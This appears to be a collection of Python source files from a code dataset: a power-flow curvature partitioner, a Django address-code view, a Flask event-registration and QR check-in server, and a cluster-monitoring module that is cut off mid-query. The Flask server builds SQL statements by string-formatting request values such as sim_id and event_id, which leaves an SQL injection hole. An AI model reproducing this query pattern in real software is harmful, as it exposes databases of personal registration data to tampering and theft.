+{"seq_id":"172525271","text":"#Code to produce values for cumulated curvature of power equations\n\nimport numpy as np\n\nimport scipy.integrate as integrate\n\nimport egret.model_library.transmission.tx_calc as tx_calc\n\nimport matplotlib.pyplot as plt\n\n\n#############\n#Functions for Curvature for Power Equations\n#############\n\n#Assumes delta can be changed, but Vi, Vj are fixed\ndef power_equation(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tif not (power_type ==\"Active\" or power_type ==\"Reactive\"):\n\t\traise ValueError('Power type must be \"Active\" (for p) or \"Reactive\" (for q)')\n\n\tif not (bus_type == \"from_bus\" or bus_type == \"to_bus\"):\n\t\traise ValueError('Bus type must be \"from_bus\" (for f) or \"to_bus\" (for t)')\n\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g - g*np.cos(delta) - b*np.sin(delta)\n\telse:\n\t\treturn -b + b*np.cos(delta) - g*np.sin(delta)\n\ndef power_deriv(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tif not (power_type ==\"Active\" or power_type ==\"Reactive\"):\n\t raise ValueError('Power type must be \"Active\" (for p) or \"Reactive\" (for q)')\n\n\tif not (bus_type == \"from_bus\" or bus_type == \"to_bus\"):\n\t raise ValueError('Bus type must be \"from_bus\" (for f) or \"to_bus\" (for t)')\n\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g*np.sin(delta) - b*np.cos(delta)\n\telse:\n\t\treturn -b*np.sin(delta) - g*np.cos(delta)\n\ndef power_second_deriv(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\tg = tx_calc.calculate_conductance(branch)\n\tb = tx_calc.calculate_susceptance(branch)\n\n\t\n\tif power_type == \"Active\":\n\t\treturn g*np.cos(delta) + b*np.sin(delta)\n\telse:\n\t\treturn -b*np.cos(delta) + g*np.sin(delta)\n\ndef curvature(delta, branch, bus_type = \"from_bus\", power_type = \"Reactive\"):\n\treturn np.absolute(power_second_deriv(delta, branch, bus_type, power_type))/(1+(power_deriv(delta, branch, bus_type, power_type))**2)\n\n#########################\n#Functions for Partitioning the domain into Q pieces of equal curvature\n#########################\n\ndef curvature_target_x_value(integration_lb, interval_lb, interval_ub, target_value, branch, bus_type=\"from_bus\", power_type=\"Reactive\", eps = 0.0001):\n\t#Finds an approximation for a value x in the domain where accumulated curvature is equal to a target value\n\t#The strategy is to recursively narrow down the given interval into smaller and smaller intervals until an acceptable point is found. \n\tx = np.linspace(interval_lb, interval_ub)\n\ti = 0\n\tfor value in x:\n\t\tcumulated_curvature = integrate.quad(curvature, integration_lb, value, args=(branch, bus_type, power_type))[0]\n\t\tif np.abs(cumulated_curvature - target_value) <= eps:\n\t\t\treturn value\n\t\tif target_value - cumulated_curvature > eps:\n\t\t\ti = i + 1\n\t\t\tcontinue\n\t\tif cumulated_curvature - target_value > eps:\n\t\t\treturn curvature_target_x_value(integration_lb, x[i-1], x[i], target_value, branch, bus_type, power_type, eps)\n\ndef eq_curvature_partition(lb, ub, Q, branch, bus_type=\"from_bus\", power_type=\"Reactive\", eps = 0.0001):\n\t#Divides the domain [lb, ub] into Q pieces of (approximately) equal curvature\n\tif Q == 1:\n\t\treturn [lb, ub]\n\tbreakpoints = [lb]\n\ttarget_value = (integrate.quad(curvature, lb, ub, args=(branch, bus_type, power_type))[0])/Q\n\tfor i in range(Q-1):\n\t\tbreakpoints.append(curvature_target_x_value(breakpoints[i], breakpoints[i], ub, target_value, branch, bus_type, power_type, eps))\n\tbreakpoints.append(ub)\n\treturn breakpoints\n\ndef dev_from_linear(lb, ub, branch, bus_type=\"bus_type\", power_type=\"Reactive\", lin_tol=0.1):\n\t#Finds an x-value where deviation from normal is more than an epsilon tolerance\n\tx = np.linspace(lb, ub)\n\tslope = (power_equation(x[1], branch, bus_type, power_type) - power_equation(x[0], branch, bus_type, power_type))/(x[1] - x[0])\n\ti = 0\n\tfor value in x: \n\t\tif np.abs(power_equation(value, branch, bus_type, power_type) - (slope*(value - x[0])+power_equation(x[0], branch, bus_type, power_type))) <= lin_tol:\n\t\t\ti = i + 1\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn x[i-1]\n\treturn ub\n\ndef close_to_linear_cuts(lb, ub, branch, bus_type, power_type=\"Reactive\", lin_tol=0.1):\n\t#Refines a given interval based on how much the power_equation deviates from the linear approximation. \n\tpartition = [lb]\n\tx = dev_from_linear(lb, ub, branch, bus_type, power_type, lin_tol)\n\tif x == ub:\n\t\tpartition.append(x)\n\t\treturn partition\n\telse:\n\t\treturn partition + close_to_linear_cuts(x, ub, branch, bus_type, power_type, lin_tol)\n\t\n\ndef refined_eq_curvature_partition(lb, ub, Q, branch, bus_type=\"from_bus\", power_type = \"Reactive\", eps=0.0001, lin_tol=0.1):\n\tpartition = eq_curvature_partition(lb, ub, Q, branch, bus_type, power_type, eps)\n\trefined_partition = [lb]\n\tfor i in range(Q):\n\t\trefined_partition = refined_partition + [partition[i]] + close_to_linear_cuts(partition[i], partition[i+1], branch, bus_type, power_type, lin_tol) + [partition[i+1]]\n\tno_dup_refined_partition = []\n\tfor j in range(len(refined_partition) - 1):\n\t\tif refined_partition[j] == refined_partition[j+1]:\n\t\t\tcontinue\n\t\telse:\n\t\t\tno_dup_refined_partition.append(refined_partition[j])\n\tno_dup_refined_partition.append(ub)\n\treturn no_dup_refined_partition\n\nif __name__ == '__main__':\n import os\n import pyomo.environ as pe\n import egret.model_library.transmission.tx_utils as tx_utils\n import egret.model_library.transmission.tx_calc as tx_calc\n import egret.model_library.transmission.bus as libbus\n import egret.model_library.transmission.branch as libbranch\n import egret.model_library.transmission.gen as libgen\n from egret.parsers.matpower_parser import create_ModelData\n\n from egret.data.data_utils import map_items, zip_items\n\n path = os.path.dirname(__file__)\n filename = 'pglib_opf_case30_ieee.m'\n test_case = os.path.join('c:\\\\', 'Users', 'wlinz', 'Desktop', 'Restoration', 'Egret', 'egret', 'thirdparty', 'pglib-opf-master', filename) #Better if this isn't so user-dependent\n md_dict = create_ModelData(test_case)\n md = md_dict.clone_in_service()\n\n branches = dict(md.elements(element_type='branch'))\n branch_attrs = md.attributes(element_type='branch')\n\n buses = dict(md.elements(element_type='bus'))\n bus_attrs = md.attributes(element_type='bus')\n\n model=pe.ConcreteModel()\n\n ### declare the polar voltages\n libbus.declare_var_va(model, bus_attrs['names'], initialize=bus_attrs['va'])\n\n libbus.declare_var_vm(model, bus_attrs['names'], initialize=bus_attrs['vm'])\n\n libbus.declare_var_vmsq(model=model,\n index_set=bus_attrs['names'],\n initialize={k: v**2 for k, v in bus_attrs['vm'].items()},\n bounds=zip_items({k: v**2 for k, v in bus_attrs['v_min'].items()},\n {k: v**2 for k, v in bus_attrs['v_max'].items()}))\n\n\n \t#print(branches)\n #print(branches.keys())\n\n branch = branches['10']\n print(branch)\n\n from_partition = eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Active\")\n\n to_partition = eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Active\")\n\n from_refined_partition = refined_eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Reactive\")\n\n to_refined_partition = refined_eq_curvature_partition(-np.pi/6, np.pi/6, 20, branch, power_type=\"Reactive\")\n\n print(\"Unrefined from partition:\", from_partition)\n\n print(\"Unrefined to partition:\", to_partition)\n\n print(\"Refined from partition:\", from_refined_partition)\n\n print(\"Refined to partition: \", to_refined_partition)\n\n x = np.linspace(-np.pi/6, np.pi/6)\n\n y1 = power_equation(x, branch)\n\n #plt.plot(x, y1)\n #plt.plot(x, y2)\n #plt.show()\n\n for i in range(len(from_partition) - 1):\n \tx = np.linspace(from_partition[i], from_partition[i+1])\n \ty = power_equation(x, branch)\n \tplt.plot(x, y)\n\n plt.show()\n\n for i in range(len(from_refined_partition) - 1):\n \tx = np.linspace(from_refined_partition[i], from_refined_partition[i+1])\n \ty = power_equation(x, branch)\n \tplt.plot(x, y)\n\n plt.show()\n\n\t\n\n\n\n\n###########\n#Plotting\n##########\n\n#Some quick code to generate a few plots for certain test cases\n\n# x2 = np.linspace(-np.pi/3, np.pi/3)\n\n# y3 = f(x2)\n\n# y4 = curvature(x2)\n\n# y5 = []\n\n# for value in x2: \n# \ty5.append(integrate.quad(lambda z: curvature(z), -np.pi/3, value)[0])\n\n# #print(x2)\n\n# #print(y4)\n\n# plt.plot(x2, y3, color = 'r')\n\n# plt.show()\n\n# plt.plot(x2, y4, color = 'g')\n\n# plt.show()\n\n# plt.plot(x2, y5, color = 'y')\n# plt.show()\n\n# for i in range(len(partition) - 1):\n# \tx = np.linspace(partition[i], partition[i+1])\n# \ty = []\n# \tfor value in x:\n# \t\ty.append(integrate.quad(lambda z: curvature(z), -np.pi/3, value)[0])\n# \tplt.plot(x, y)\n\n# plt.show()\n\n###############\n#Square Example\n###############\n\n# def square_curvature_target_x_value(integration_lb, interval_lb, interval_ub, target_value, eps = 0.0001):\n# \tx = np.linspace(interval_lb, interval_ub)\n# \ti = 0\n# \tfor value in x:\n# \t\tcumulated_curvature = integrate.quad(lambda z: 2.0/(1+4*z**2), integration_lb, value)[0]\n# \t\tif np.abs(cumulated_curvature - target_value) <= eps:\n# \t\t\treturn value\n# \t\tif target_value - cumulated_curvature > eps:\n# \t\t\ti = i + 1\n# \t\t\tcontinue\n# \t\tif cumulated_curvature - target_value > eps:\n# \t\t\treturn square_curvature_target_x_value(integration_lb, x[i-1], x[i], target_value, eps)\n\n# def square_eq_curvature_partition(lb, ub, Q = 20, eps = 0.0001):\n# \tif Q == 1:\n# \t\treturn [lb, ub]\n# \tbreakpoints = [lb]\n# \ttarget_value = (integrate.quad(lambda z: 2.0/(1+4*z**2), lb, ub)[0])/Q\n# \tfor i in range(Q-1):\n# \t\tbreakpoints.append(square_curvature_target_x_value(breakpoints[i], breakpoints[i], ub, target_value, eps))\n# \tbreakpoints.append(ub)\n# \treturn breakpoints\n\n# partition = square_eq_curvature_partition(-5.0, 5.0, 100)\n\n# x = np.linspace(-5.0, 5.0)\n\n# y1 = x**2\n\n# plt.plot(x, y1, color=\"g\")\n# plt.show()\n\n# # y2 = 2.0/np.sqrt(1+4*x**2)\n# # plt.plot(x, y2)\n# # plt.show()\n\n# # y3 = []\n\n# # for value in x:\n# # \ty3.append(integrate.quad(lambda z: 2.0/(1+4*z**2), -5.0, value)[0])\n\n# # plt.plot(x, y3)\n# # plt.show()\n\n# for i in range(len(partition) - 1):\n# \tx = np.linspace(partition[i], partition[i+1])\n# \ty = x**2\n# \t# for value in x:\n# \t# \ty.append(integrate.quad(lambda z: 2.0/(1+4*z**2), -5.0, value)[0])\n# \tplt.plot(x, y)\n\n# plt.show()\n\n\n\t\t\t\n\n","sub_path":"egret/models/Aravena_PWL_Approximations/Curvature.py","file_name":"Curvature.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"511369719","text":"from random import choice\nfrom data.AssetUtil import resPathToAbs\nfrom PyQt5.QtWidgets import QMessageBox\n\ndef showMessage (text):\n msgBox = QMessageBox( )\n msgBox.setIcon( QMessageBox.Information )\n msgBox.setText( text )\n\n msgBox.addButton( QMessageBox.Close )\n\n msgBox.setDefaultButton( QMessageBox.Close ) \n msgBox.exec_()\n \nmonsterNames = []\ndef getRandomMonsterName ():\n if len(monsterNames) == 0:\n #No cached Version of names available, so we have to load one from file\n with open(resPathToAbs(\"Monster_Names.txt\")) as f:\n for line in f:\n if line.endswith(\"\\n\"):\n line = line[:-1]\n monsterNames.append(line)\n return choice(monsterNames)\n \n\n\n","sub_path":"morestrategy_too/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"299586471","text":"#!/usr/bin/env python\n# enconding! utf-8\n\n\"\"\"\n@author:zhangmengzgs\n@contact:zhangmengzgs@csc.com.cn\n@file:DataFeed.py\n@time:2017/1/23 8:29\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nfrom DataPool import MainDataPool\nfrom DefaultLog import MainLogger\nfrom Event import EventFactory\nfrom datetime import datetime, timedelta\n\n\nclass DataFeed(object):\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def register_engine(self, engine):\n raise NotImplementedError\n\n @abstractmethod\n def start(self):\n raise NotImplementedError\n\n\nclass HeartBeatFeed(DataFeed):\n def __init__(self, start_date, end_date, delta):\n self.engine_list = []\n self.start_date = start_date\n self.end_date = end_date\n\n self.delta = delta\n self.trading_day = MainDataPool.get_trading_day(self.start_date, self.end_date)\n\n def start(self):\n \"\"\"启动心跳源\"\"\"\n MainLogger.info('心跳启动...')\n for trade_day in self.trading_day:\n if not self.engine_list:\n MainLogger.error('Engine list is empty!')\n raise ValueError()\n else:\n\n event = EventFactory.create_day_begin_event(trade_day)\n for engine in self.engine_list:\n engine.put_data(event)\n\n for hb in self.heart_beat(trade_day):\n event = EventFactory.create_heartbeat_event(hb)\n for engine in self.engine_list:\n engine.put_data(event)\n\n event = EventFactory.create_day_end_event(trade_day)\n for engine in self.engine_list:\n engine.put_data(event)\n for engine in self.engine_list:\n event = EventFactory.create_stop_hb_event()\n engine.put_data(event)\n\n def heart_beat(self, date):\n \"\"\"心跳节拍器\"\"\"\n step = timedelta(minutes=self.delta)\n\n morning_begin = datetime.strptime(date+' 9:30:00', '%Y%m%d %H:%M:%S')\n morning_end = datetime.strptime(date+' 11:29:00', '%Y%m%d %H:%M:%S')\n afternoon_begin = datetime.strptime(date+' 13:00:00', '%Y%m%d %H:%M:%S')\n afternoon_end = datetime.strptime(date+' 15:00:00', '%Y%m%d %H:%M:%S')\n\n while morning_begin <= morning_end:\n yield morning_begin\n morning_begin += step\n\n while afternoon_begin <= afternoon_end:\n yield afternoon_begin\n afternoon_begin += step\n\n def register_engine(self, engine):\n \"\"\"注册引擎\"\"\"\n if engine not in self.engine_list:\n self.engine_list.append(engine)\n else:\n MainLogger.warn('该引擎已经注册了!')\n\nif __name__ == \"__main__\":\n df = HeartBeatFeed('20150101', '20150110', delta=10)\n for hb in df.heart_beat('20150107'):\n print(hb)","sub_path":"DataFeed.py","file_name":"DataFeed.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"57679631","text":"from django.shortcuts import render,redirect\r\nimport sqlite3\r\nfrom django.core.mail import EmailMessage\r\n# Create your views here.\r\ndef index(request):\r\n #template = loader.get_template(\"Home/index.html\")\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n result = cur.execute(\"\"\"SELECT * FROM temp\"\"\")\r\n result_list = result.fetchall()\r\n if(len(result_list) >0):\r\n context={'number' : 1,'pincode' : result_list[0][1] , 'ZoneNo' : result_list[0][2] ,'WingNo' : result_list[0][5] ,'FlatNo' : result_list[0][6] ,'Locality' : result_list[0][10],'BuildingNo' : result_list[0][11]}\r\n else:\r\n context = {'number' : 0}\r\n return render(request,'newadmin/newadmin.html' ,context )\r\n\r\ndef tempdel(request):\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n result = cur.execute(\"\"\"SELECT * FROM temp\"\"\")\r\n result_list = result.fetchall()\r\n\r\n index1 = result_list[0][0]\r\n submit = request.POST.get('add')\r\n print(submit)\r\n if submit == 'y':\r\n pincode = '411011'\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query2 = \"Select lat from \" + tablename # returns tuple of lat and long\r\n zones = cur.execute(query2)\r\n zonec = zones.fetchall()\r\n index = -1\r\n for i in zonec:\r\n index = index + 1\r\n\r\n query6 = \"INSERT INTO \" + tablename + \"\"\" VALUES ( :indexno, :pincode, :zone , :lat, :long, :wing, :flat, :state, :district, :premise, :locality, :b)\"\"\"\r\n cur.execute(query6, {'indexno': index + 1, 'pincode': result_list[0][1], 'zone': result_list[0][2],\r\n 'lat': result_list[0][3], 'long': result_list[0][4], 'wing': result_list[0][5],\r\n 'flat': result_list[0][6], 'state': str(result_list[0][7]),\r\n 'district': str(result_list[0][8]), 'premise': str(result_list[0][9]),\r\n 'locality': str(result_list[0][10]), 'b': result_list[0][11]})\r\n cur.execute(\"DELETE from temp where INDEXNO = \" + str(index1))\r\n conn.commit()\r\n dcode1 = getDcode(result_list[0][1], result_list[0][11], result_list[0][5], result_list[0][6], result_list[0][11], result_list[0][10])\r\n to_email = result_list[0][12]\r\n email = EmailMessage(\"Decode Successfully Generated!\", \"Your Dcode is \"+str(dcode1), to=[to_email])\r\n email.send()\r\n else:\r\n cur.execute(\"DELETE from temp where INDEXNO = \" + str(index1))\r\n conn.commit()\r\n\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n return redirect('index')\r\n\r\n\r\ndef getDcode(pincode1, building, wingno, flatno, h_address, s_address):\r\n #get_decode(pincode , building , wingno , flatno , h_address ,s_address)\r\n #db = 1\r\n #list of our number system\r\n alpha = list()\r\n for m in range(48 , 58):\r\n alpha.append(chr(m))\r\n for m in range(65 , 91):\r\n alpha.append(chr(m))\r\n for m in range(97,123):\r\n alpha.append(chr(m))\r\n alpha.append('+')\r\n alpha.append('#')\r\n #--------------------------------------------------------------------------------\r\n #dumpy input\r\n pincode = pincode1\r\n flat = flatno\r\n wing = wingno\r\n building_name = str(building) ##\r\n\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n #---------------------------------------------------------------------------------\r\n #For index of pincode in master table\r\n query1 = \"Select pincode from PINS\" #returns tuple of lat and long\r\n print(query1)\r\n p = cur.execute(query1)\r\n plist = p.fetchall()\r\n\r\n #converting tuple to list\r\n pinslist = list()\r\n for i in plist:\r\n if i[0] == 'pincode':\r\n pass\r\n else:\r\n pinslist.append(i[0])\r\n\r\n index = 0\r\n for l in pinslist:\r\n if pincode == l:\r\n break\r\n index = index + 1\r\n\r\n flag = 0\r\n for k in range(64):\r\n for j in range(64):\r\n for i in range(64):\r\n if(i + j*64 + k*64*64 == index):\r\n flag = 1\r\n break\r\n if flag == 1:\r\n break\r\n if flag == 1:\r\n break\r\n if(flag == 1):\r\n dcode = str(alpha[k]) + str(alpha[j]) + str(alpha[i])\r\n #------------------------------------------------------------------------------\r\n #for zone of buliding\r\n x = 0\r\n if x == 0:\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query8 = \"Select zn,lat,long from \" + tablename + \"\"\" where flatno = :f and wing = :w and buildingno = :b\"\"\"\r\n print(query8,{'f': flat, 'w': wing, 'b': building_name})\r\n z = cur.execute(query8,{'f': flat, 'w': wing, 'b': building_name})\r\n alist = z.fetchall()\r\n\r\n #converting tuple to list\r\n addlist = list()\r\n latlist = list()\r\n longlist = list()\r\n for i in alist:\r\n if i[0] == 'zone':\r\n pass\r\n else:\r\n addlist.append(int(i[0]))\r\n latlist.append(i[1])\r\n longlist.append(i[2])\r\n\r\n zone = addlist[0]\r\n print(zone)\r\n latitude = latlist[0]\r\n longitude = longlist[0] ## #change if f1.py run. change it to zone value from DB browser of that entry\r\n dcode = dcode + str(alpha[zone])\r\n #------------------------------------------------------------------------------\r\n\r\n #for entry in zt\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query2 = \"Select * from \" + tablename + \"\"\" where lat = :la and long = :lo and zn = :zo and wing = :w and flatno = :f \"\"\" #returns tuple of lat and long\r\n #print(query2,{'la':18.524174, 'lo':73.865229, 'zo':zone, 'w':1, 'f':2})\r\n a = cur.execute(query2,{'la':latitude, 'lo':longitude, 'zo':zone, 'w':wingno, 'f':flatno})\r\n add = a.fetchall()\r\n addresslist = list()\r\n for i in add:\r\n if i[0] == 'indexno':\r\n pass\r\n else:\r\n addresslist.append(i[0])\r\n index = addresslist[0]\r\n flag = 0\r\n for k in range(64):\r\n for j in range(64):\r\n for i in range(64):\r\n if(i + j*64 + k*64*64 == index):\r\n flag = 1\r\n break\r\n if flag == 1:\r\n break\r\n if flag == 1:\r\n break\r\n if(flag == 1):\r\n dcode = dcode + str(alpha[k]) + str(alpha[j]) + str(alpha[i])\r\n #------------------------------------------------------------------------------\r\n return dcode\r\n","sub_path":"Django/Dcode/newadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"139707201","text":"# Created by Aashish Adhikari at 7:51 PM 4/25/2020\n\n\ndef merge(nums1, m, nums2, n):\n\n ctr1 = 0\n ctr2 = 0\n idx = 0\n\n import copy\n extra_copy = copy.deepcopy(nums1)\n\n while idx < m + n:\n\n if ctr1 >= m:\n for item in range(ctr2, n):\n nums1[idx] = nums2[item]\n idx += 1\n break\n\n if ctr2 >= n:\n for item in range(ctr1, m):\n nums1[idx] = extra_copy[item]\n idx += 1\n break\n\n if extra_copy[ctr1] < nums2[ctr2]:\n nums1[idx] = extra_copy[ctr1]\n ctr1 += 1\n else:\n nums1[idx] = nums2[ctr2]\n ctr2 += 1\n\n idx += 1\n\n return nums1\nprint(merge([4, 5, 6, 0, 0, 0], 3, [2, 5, 6], 3))\n\n\n\n\n\n\n","sub_path":"LeetCode_Problems/Arrays_101/Merging_Two_Sorted_Arrays_2.py","file_name":"Merging_Two_Sorted_Arrays_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"571944468","text":"from flask import Flask\nfrom flask import request\nfrom flask import render_template\nfrom flask_cors import CORS\n\nimport cv2\nimport json\nimport numpy as np\nimport mysql.connector\nfrom argparse import ArgumentParser\nfrom PIL import Image\nfrom qrcode import detect_and_decode\n\nparser = ArgumentParser()\nparser.add_argument('--debug', type=int, required=True, help='Debug mode')\nparser.add_argument('--mysql-user', type=str, required=True, help='MySQL username')\nparser.add_argument('--mysql-pwd', type=str, required=True, help='MySQL password')\nargs = vars(parser.parse_args())\n\n### Some constants ###\nPORT=8080\nDEBUG=bool(args['debug'])\n\napp = Flask(__name__)\nCORS(app)\n\ndef _get_mysql_connection():\n\tdb = mysql.connector.connect(\n\t\thost = '127.0.0.1',\n\t\tdatabase = 'dac',\n\t\tuser = args['mysql_user'],\n\t\tpasswd = args['mysql_pwd']\n\t)\n\n\treturn db\n\n@app.route(\"/\")\ndef home():\n return \"
Hello World
\"\n\n@app.route('/list-events', methods=['POST'])\ndef list_events():\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\n\tsql = 'SELECT * FROM events'\n\tcursor.execute(sql)\n\n\tresults = cursor.fetchall()\n\tprint(results)\n\tevents = []\n\n\tfor row in results:\n\t\tevents.append('%s - %s' % (row[0], row[1]))\n\n\tconnection.close()\n\treturn json.dumps(events)\n\n@app.route('/add-participant', methods=['POST'])\ndef add_participant():\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\n\tif(request.method == 'POST'):\n\t\tfirst_name = request.form['first-name']\n\t\tlast_name = request.form['last-name']\n\t\temail = request.form['email']\n\t\tsim_id = request.form['sim-id']\n\t\tevent = request.form['selected_event']\n\t\tevent_id = event.split('-')[0].strip()\n\t\tattended = 0\n\n\t\t# Check if this sim id is registered with this event \n\t\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\t\tif(cursor.rowcount >= 1): # if repeated registration\n\t\t\t### Delete ###\n\t\t\tprint('[INFO] Repeated registration for sim_id = %s and event_id = %s' % (sim_id, event_id))\n\t\t\tsql = \"DELETE FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\t\t\tcursor.execute(sql)\n\t\t\tconnection.commit()\n\n\n\t\t### Insert new record ###\n\t\tsql = 'INSERT INTO registration VALUES (%s, %s, %s, %s, %s, %s)'\n\t\tvalues = (\n\t\t\tfirst_name, last_name, email, sim_id, event_id, attended\n\t\t)\n\n\t\tcursor.execute(sql, values)\n\t\tconnection.commit()\n\t\tconnection.close()\n\n\t\t### Generate qr code and send to participant ###\n\t\t# in data we will have the sim id of the participant and event id\n\t\tqrcode = '%s-%s' % (sim_id, event_id)\n\n\n\t\tif(cursor.rowcount >= 1):\n\t\t\treturn qrcode # 'success'\n\t\telse:\n\t\t\treturn 'failed'\n\n@app.route('/qrcode', methods=['POST'])\ndef qrcode():\n\tif(request.method=='POST'):\n\t\timg = Image.open(request.files['img']).convert('RGB')\n\t\timg = np.array(img)\n\t\timg = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n\t\t# print(img)\n\t\trects, data, types = detect_and_decode(img)\n\t\tif(len(rects) < 1):\n\t\t\treturn 'no_code'\n\t\telif(len(rects) > 1):\n\t\t\treturn 'more_than_one'\n\n\t### Check if data is in proper format ###\n\t# in data we will have the sim id of the participant and event id\n\tsplits = data[0].split('-')\n\tif(len(splits) != 2):\n\t\tprint(splits)\n\t\treturn 'invalid_format'\n\telse:\n\t\tsim_id = splits[0]\n\t\tevent_id = splits[1]\n\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\t\n\t### Check if the sim_id and event_id is inside ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tif(cursor.rowcount == 0):\n\t\treturn 'not_registered'\n\n\t### Check if sim_id and event_id is inside but attended already ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s' AND attended=1\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tif(cursor.rowcount >= 1):\n\t\treturn 'attended'\n\n\t### Find info about participant ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s' AND attended=0\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tinfo = results[0]\n\tresponse = 'success-' + str(info[0]) + '-' + str(info[1]) + '-' + str(info[4])\n\n\t### If none of above circumstances, update ###\n\tsql = \"UPDATE registration SET attended=1 WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tconnection.commit()\n\tconnection.close()\n\n\treturn response\n\n@app.route('/list-participants', methods=['POST'])\ndef list_participants():\n\tif request.method == 'POST':\n\t\tevent_id = request.form['event_id']\n\t\tevent_name = request.form['event_name']\n\n\t\tsql = 'SELECT * FROM registration WHERE event_id=\"%s\"' % event_id\n\t\tconnection = _get_mysql_connection()\n\t\tcursor = connection.cursor()\n\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\n\t\tparticipants = []\n\t\tfor row in results:\n\t\t\tparticipants.append(row)\n\n\t\tparticipants = json.dumps(participants)\n\n\t\tconnection.close()\n\n\t\treturn participants\n\nif __name__ == '__main__':\n\tif(DEBUG):\n\t\tprint('[INFO] Running in debugging mode ... ')\n\telse:\n\t\tprint('[INFO] Running in deploying mode ... ')\n\n\tapp.run(port=PORT, host='0.0.0.0', debug=DEBUG)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"414338347","text":"import settings\n\n\ndef cal_swap(cluster):\n \"\"\"\n calculate each node's swap usage ratio and store it in node.indicators['swap_ratio']\n \"\"\"\n for node in cluster.nodes:\n if node.states['swap_total'] is None or node.states['swap_used'] is None:\n node.indicators.update({'swap_ratio': None})\n continue\n node.indicators.update({'swap_ratio': node.states['swap_used']/node.states['swap_total']})\n\n\ndef cal_mem(cluster):\n \"\"\"\n calculate each node's memory usage ratio from 'free -m' and store it in node.indicators['mem_ratio']\n calculate each node's memory usage from `top` and store it in node.indicators['ps_mem_ratio']\n calculate whether each node has memory less than settings and store it in node.indicators['mem_less_than_settings']\n \"\"\"\n for node in cluster.nodes:\n if node.states['mem_total'] is None or node.states['mem_used'] is None or node.states['ps'] is None:\n node.indicators.update({'mem_less_than_settings': None})\n node.indicators.update({'mem_ratio': None})\n node.indicators.update({'ps_mem_ratio': None})\n continue\n if not node.states['mem_total'] > settings.MEM[cluster.name][node.name]*(1-settings.MEM_TOL_TOL):\n node.indicators.update({'mem_less_than_settings': True})\n else:\n node.indicators.update({'mem_less_than_settings': False})\n node.indicators.update({'mem_ratio': node.states['mem_used']/node.states['mem_total']})\n cursor = node.states['ps'].cursor()\n cursor.execute('''\n SELECT SUM(mem) FROM process\n '''\n )\n ps_mem = cursor.fetchall()[0][0]\n # SQL may return None if no record is present\n if ps_mem is None:\n ps_mem = 0\n node.indicators.update({'ps_mem_ratio': ps_mem/100.0})\n\n\ndef cal_ps_num(cluster):\n \"\"\"\n calculate each node's number of processes for each user and decide whether they are equal to the number of cpu\n assigned to the job\n the data is stored in node.indicators['not_equal_ps_num'] as {'user': user, 'ps_num': ps_num, 'cpu_num': cpu_num}\n also, check whether a node is assigned to a job but no processes are present and store it in\n node.indicators['no_ps'] as ['wangc', 'liuyz']\n \"\"\"\n for node in cluster.nodes:\n if node.states['ps'] is None or cluster.states['jobs'] is None or cluster.states['stime'] is None or \\\n node.states['users'] is None:\n node.indicators.update({'not_equal_ps_num': None})\n node.indicators.update({'no_ps': None})\n continue\n job_cursor = cluster.states['jobs'].cursor()\n node.indicators.update({'not_equal_ps_num': []})\n node.indicators.update({'no_ps': []})\n ps_cursor = node.states['ps'].cursor()\n # check whether job changes when cluster manager is running. If true, abort the calculation\n job_cursor.execute('''\n SELECT job_id, owner, state FROM job\n WHERE node 